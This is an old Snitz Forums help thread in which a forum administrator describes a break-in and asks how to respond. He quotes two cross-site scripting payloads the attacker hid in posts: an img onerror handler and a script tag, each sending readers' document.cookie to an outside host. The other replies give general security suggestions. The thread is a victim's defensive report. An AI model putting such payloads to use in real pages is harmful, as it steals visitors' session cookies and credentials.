Snitz Forums 2000
Snitz Forums 2000
Home | Profile | Register | Active Topics | Members | Search | FAQ
Username:
 Password:
Save Password
Forgot your Password?

 All Forums
 Help Groups for Snitz Forums 2000 Users
 Help: General / Current Version (Old)
 Help !!! Urgent !!!		  New Topic  Topic Locked
 Printer Friendly
Author Previous Topic Topic Next Topic  

DHT
Starting Member

37 Posts
Posted - 07 July 2001 :  05:10:18  Show Profile
Today, my forum has been hacked. The hacker by some ways access with the admin account (my admin. password up to 10 character!) He deleted entire forums.

After replaced database with backup file, he access again and leave this hidden code in his message:


...
img src=""http://www.laptrinh.f2s.com""onerror=""this.src=src+'/test.pl?test='+escape(document.cookie);"" border=0
...

I guess that test.pl can catch the cookie of users that read his message. Can he do it ? The Snitz program add the password into the cookie, so can this hacker obtain password by this way ?

If it true, what should be the solution ?

Urgent, please !

simonduz
Junior Member

161 Posts
Posted - 07 July 2001 :  09:33:03  Show Profile  Visit simonduz's Homepage  Send simonduz an ICQ Message  Send simonduz a Yahoo! Message
Where is you DB located, and what is the security on that location.
I used to have those problems (not as severe though) till I moved my DB outside of the www root.
This will be interesting to follow. Security is a big issue with IIS.
Simonduz

http://easyromantic.webbhost.net -[test site]-
yada, yada.
Go to Top of Page

DHT
Starting Member

37 Posts
Posted - 07 July 2001 :  12:46:19  Show Profile
I have the database on different drive! Since that hacker obtained the admin password so he can do anything in forum. Here is another hidden code that I found in my forum:

...
script language="JavaScript">var s1="htt"+"p://blake.prohosting.com/newaus/cgi-bin/image.cgi?VietBao=";var st=document.cookie;document.write("<img border=0 width=0 height=0 src=\"",s1,st,"\">");</script
...

The same thing that this guy try to catch cookie of other users! At this time, my temporary solution is replace (or remove) string "document.cookie" in post or reply message in post.asp (search for T_Message or R_Message)

Any opinion from Snitz's developers, please ?


Edited by - DHT on 07 July 2001 12:47:49
Go to Top of Page

Aznknight
Senior Member

USA
1373 Posts
Posted - 07 July 2001 :  14:54:01  Show Profile  Send Aznknight an AOL message  Send Aznknight an ICQ Message
this is pretty serious. my forums were hacked too by someone somehow obtaining the pw to one of the admin accounts.

i don't know the solution to this either.

- Alan
www.iamviet.com
www.calvsa.net
Snitz Resource
Go to Top of Page

work mule
Senior Member

USA
1358 Posts
Posted - 10 July 2001 :  00:32:34  Show Profile
Here's your answer:
http://forum.snitz.com/forum/link.asp?TOPIC_ID=12707



The Work Mule Forums
The Writer Community
Go to Top of Page
  Previous Topic Topic Next Topic  
 New Topic  Topic Locked
 Printer Friendly
Jump To:
Snitz Forums 2000 © 2000-2021 Snitz™ Communications Go To Top Of Page
This page was generated in 0.27 seconds. Powered By: Snitz Forums 2000 Version 3.4.07